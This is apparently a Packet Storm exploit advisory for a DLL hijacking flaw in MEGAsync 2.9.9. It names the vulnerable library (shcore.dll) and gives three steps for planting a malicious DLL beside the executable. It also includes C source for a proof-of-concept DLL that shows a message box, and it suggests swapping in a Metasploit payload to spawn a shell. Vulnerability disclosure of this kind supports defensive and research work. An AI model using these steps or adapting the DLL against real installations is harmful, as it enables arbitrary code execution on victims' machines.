MEGAsync version 2.9.9 suffers from a dll hijacking vulnerability.
467b99e7de6c333211eb620208e20c59316c0ecf3e1759eeb9e0e0987e558cf1# Exploit Title: MEGAsync DLL Hijacking Exploit (shcore.dll)
# Date: 27-8-2016
# Author: Amir.ght
# Vendor Homepage: https://mega.nz
# Software Link:
https://mega.nz/MEGAsyncSetup.exe
# Version: 2.9.9
# Tested on:Windows 7
----------------------------------------------------------------------------------------------------------
Vuln DLL: shcore.dll
MEGAsync.exe will search for an load any DLL named "shcore.dll".
If an attacker can place the DLL in a location
where victim open MEGAsync.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile below C code as 'shcore.dll' to create vuln DLL
2- Place 'shcore.dll' on Same Directory of MEGAsync
3- Open MEGAsync.exe :DLL
//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed